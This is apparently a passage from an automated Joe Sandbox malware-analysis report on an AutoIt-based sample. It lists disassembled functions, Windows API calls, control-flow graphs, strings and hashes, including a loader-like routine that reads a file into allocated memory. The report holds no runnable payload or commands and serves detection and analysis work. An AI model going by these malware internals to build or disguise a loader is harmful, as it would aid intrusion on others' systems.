                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                      • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                      • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                      • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                      Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • RegisterClassExW.USER32(00000030), ref: 0040309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • LoadIconW.USER32(000000A9), ref: 004030F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                      • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                      • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                      • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                      Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1275 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1292 43e8b1-43e8cc RegQueryValueExW 1275->1292 1293 4071b6-4071d3 call 405904 * 2 1275->1293 1295 43e943-43e94f RegCloseKey 1292->1295 1296 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1292->1296 1295->1293 1298 43e955-43e959 1295->1298 1309 43e92b-43e931 1296->1309 1310 43e90f-43e929 call 407bcc 1296->1310 1301 43e95e-43e984 call 4079f2 * 2 1298->1301 1315 43e986-43e994 call 4079f2 1301->1315 1316 43e9a9-43e9b6 call 422bfc 1301->1316 1313 43e933-43e940 call 420e2c * 2 1309->1313 1314 43e941 1309->1314 1310->1309 1313->1314 1314->1295 1315->1316 1328 43e996-43e9a7 call 422d8d 1315->1328 1326 43e9b8-43e9c9 call 422bfc 1316->1326 1327 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1316->1327 1326->1327 1336 43e9cb-43e9db call 422d8d 1326->1336 1327->1293 1335 43ea1c-43ea1d 1327->1335 1328->1335 1335->1301 1336->1327
                      APIs
                        • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                        • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                      • RegCloseKey.ADVAPI32(?), ref: 0043E947
                      • _wcscat.LIBCMT ref: 0043E9A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 2673923337-2727554177
                      • Opcode ID: 2339a6e38c738e1e5868acd85c2b1d1357b8c61d0ac3e7440698b3df1474ed22
                      • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                      • Opcode Fuzzy Hash: 2339a6e38c738e1e5868acd85c2b1d1357b8c61d0ac3e7440698b3df1474ed22
                      • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                      Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1345 403633-403681 1347 4036e1-4036e3 1345->1347 1348 403683-403686 1345->1348 1347->1348 1349 4036e5 1347->1349 1350 4036e7 1348->1350 1351 403688-40368f 1348->1351 1354 4036ca-4036d2 DefWindowProcW 1349->1354 1355 4036ed-4036f0 1350->1355 1356 43d0cc-43d0fa call 411070 call 411093 1350->1356 1352 403695-40369a 1351->1352 1353 40374b-403753 PostQuitMessage 1351->1353 1358 4036a0-4036a2 1352->1358 1359 43d154-43d168 call 462527 1352->1359 1360 403711-403713 1353->1360 1361 4036d8-4036de 1354->1361 1362 4036f2-4036f3 1355->1362 1363 403715-40373c SetTimer RegisterWindowMessageW 1355->1363 1389 43d0ff-43d106 1356->1389 1365 403755-403764 call 4044a0 1358->1365 1366 4036a8-4036ad 1358->1366 1359->1360 1382 43d16e 1359->1382 1360->1361 1369 4036f9-40370c KillTimer call 40443a call 403114 1362->1369 1370 43d06f-43d072 1362->1370 1363->1360 1367 40373e-403749 CreatePopupMenu 1363->1367 1365->1360 1372 4036b3-4036b8 1366->1372 1373 43d139-43d140 1366->1373 1367->1360 1369->1360 1376 43d074-43d076 1370->1376 1377 43d0a8-43d0c7 MoveWindow 1370->1377 1380 43d124-43d134 call 462d36 1372->1380 1381 4036be-4036c4 1372->1381 1373->1354 1387 43d146-43d14f call 457c36 1373->1387 1384 43d097-43d0a3 SetFocus 1376->1384 1385 43d078-43d07b 1376->1385 1377->1360 1380->1360 1381->1354 1381->1389 1382->1354 1384->1360 1385->1381 1390 43d081-43d092 call 411070 1385->1390 1387->1354 1389->1354 1394 43d10c-43d11f call 40443a call 40434a 1389->1394 1390->1360 1394->1354
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                      • KillTimer.USER32(?,00000001), ref: 004036FC
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                      • CreatePopupMenu.USER32 ref: 0040373E
                      • PostQuitMessage.USER32(00000000), ref: 0040374D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated$%I
                      • API String ID: 129472671-1195164674
                      • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                      • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                      • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                      • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                      Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                      • LoadIconW.USER32(00000063), ref: 00403A76
                      • LoadIconW.USER32(000000A4), ref: 00403A88
                      • LoadIconW.USER32(000000A2), ref: 00403A9A
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                      • RegisterClassExW.USER32(?), ref: 00403B16
                        • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                        • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                        • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                        • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                        • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                        • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                        • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                      • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                      • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                      • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                      Function 02F5CE90 Relevance: 16.2, APIs: 10, Instructions: 1193COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 40c8a526af83e874734c458cd66a66ea69c56a95b20cec43cae739a4875aff13
                      • Instruction ID: 8279188914b1c91fb84030c9c235a9ab88c099852fc9e6d557e3eb9f9c242614
                      • Opcode Fuzzy Hash: 40c8a526af83e874734c458cd66a66ea69c56a95b20cec43cae739a4875aff13
                      • Instruction Fuzzy Hash: 6DA2C171D0E3A08FD735CB18C85476ABBE1AFC5398F09495EEB9997292D334A404CB93
                      Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                      Download Yara Rule

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                      • API String ID: 1825951767-3937808951
                      • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                      • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                      • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                      • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                      Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                        • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                        • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                      • OleInitialize.OLE32(00000000), ref: 0040FA4A
                      • CloseHandle.KERNEL32(00000000), ref: 004445C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID: <WL$\TL$%I$SL
                      • API String ID: 1986988660-4199584472
                      • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                      • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                      • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                      • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                      Function 00BA45C8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2011 ba45c8-ba4676 call ba1fe8 2014 ba467d-ba46a3 call ba54d8 CreateFileW 2011->2014 2017 ba46aa-ba46ba 2014->2017 2018 ba46a5 2014->2018 2025 ba46bc 2017->2025 2026 ba46c1-ba46db VirtualAlloc 2017->2026 2019 ba47f5-ba47f9 2018->2019 2020 ba483b-ba483e 2019->2020 2021 ba47fb-ba47ff 2019->2021 2027 ba4841-ba4848 2020->2027 2023 ba480b-ba480f 2021->2023 2024 ba4801-ba4804 2021->2024 2028 ba481f-ba4823 2023->2028 2029 ba4811-ba481b 2023->2029 2024->2023 2025->2019 2030 ba46dd 2026->2030 2031 ba46e2-ba46f9 ReadFile 2026->2031 2032 ba484a-ba4855 2027->2032 2033 ba489d-ba48b2 2027->2033 2038 ba4833 2028->2038 2039 ba4825-ba482f 2028->2039 2029->2028 2030->2019 2040 ba46fb 2031->2040 2041 ba4700-ba4740 VirtualAlloc 2031->2041 2034 ba4859-ba4865 2032->2034 2035 ba4857 2032->2035 2036 ba48c2-ba48ca 2033->2036 2037 ba48b4-ba48bf VirtualFree 2033->2037 2042 ba4879-ba4885 2034->2042 2043 ba4867-ba4877 2034->2043 2035->2033 2037->2036 2038->2020 2039->2038 2040->2019 2044 ba4742 2041->2044 2045 ba4747-ba4762 call ba5728 2041->2045 2048 ba4892-ba4898 2042->2048 2049 ba4887-ba4890 2042->2049 2047 ba489b 2043->2047 2044->2019 2051 ba476d-ba4777 2045->2051 2047->2027 2048->2047 2049->2047 2052 ba47aa-ba47be call ba5538 2051->2052 2053 ba4779-ba47a8 call ba5728 2051->2053 2059 ba47c2-ba47c6 2052->2059 2060 ba47c0 2052->2060 2053->2051 2061 ba47c8-ba47cc CloseHandle 2059->2061 2062 ba47d2-ba47d6 2059->2062 2060->2019 2061->2062 2063 ba47d8-ba47e3 VirtualFree 2062->2063 2064 ba47e6-ba47ef 2062->2064 2063->2064 2064->2014 2064->2019
                      APIs
                      • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BA4699
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BA48BF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                      • Instruction ID: 2255011a4b1eac7a621b2c7960ca6b2d06482aa0acbd8d94485c19195ef55a78
                      • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                      • Instruction Fuzzy Hash: A5A11874E04209EBDB14CFA4C998BEEB7B5FF89304F208599E101BB281D7B99E44CB54
                      Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2142 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                      • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                      • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                      • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                      • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                      • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                      Function 00BA4398 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2495 ba4398-ba44c8 call ba1fe8 call ba4288 CreateFileW 2502 ba44ca 2495->2502 2503 ba44cf-ba44df 2495->2503 2504 ba457f-ba4584 2502->2504 2506 ba44e1 2503->2506 2507 ba44e6-ba4500 VirtualAlloc 2503->2507 2506->2504 2508 ba4502 2507->2508 2509 ba4504-ba451b ReadFile 2507->2509 2508->2504 2510 ba451f-ba4559 call ba42c8 call ba3288 2509->2510 2511 ba451d 2509->2511 2516 ba455b-ba4570 call ba4318 2510->2516 2517 ba4575-ba457d ExitProcess 2510->2517 2511->2504 2516->2517 2517->2504
                      APIs
                        • Part of subcall function 00BA4288: Sleep.KERNEL32(000001F4), ref: 00BA4299
                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA44BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480804152.0000000000BA1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BA1000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ba1000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: TGHE7ROQIPNLY106FNSBTWCC
                      • API String ID: 2694422964-3181031890
                      • Opcode ID: 4716bc230f5bdf2bb550b2c333e3234bd3a9fe54224e1130927f72fbe0180c48
                      • Instruction ID: ab1a56afd4f73285891d2b24d1fe3de31ead00cd438b5e5d44c4e98cec0d819d
                      • Opcode Fuzzy Hash: 4716bc230f5bdf2bb550b2c333e3234bd3a9fe54224e1130927f72fbe0180c48
                      • Instruction Fuzzy Hash: C9517171D08288EBEF11D7E4C855BEEBBB4AF55304F104599E6087B2C1D7B90B48CBA5
                      Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2519 40407c-404092 2520 404098-4040ad call 407a16 2519->2520 2521 40416f-404173 2519->2521 2524 4040b3-4040d3 call 407bcc 2520->2524 2525 43d3c8-43d3d7 LoadStringW 2520->2525 2528 43d3e2-43d3fa call 407b2e call 406fe3 2524->2528 2529 4040d9-4040dd 2524->2529 2525->2528 2538 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2528->2538 2541 43d400-43d41e call 407cab call 406fe3 call 407cab 2528->2541 2531 4040e3-4040e8 call 407b2e 2529->2531 2532 404174-40417d call 408047 2529->2532 2531->2538 2532->2538 2538->2521 2541->2538
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • _memset.LIBCMT ref: 004040FC
                      • _wcscpy.LIBCMT ref: 00404150
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                      • String ID: Line:
                      • API String ID: 3942752672-1585850449
                      • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                      • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
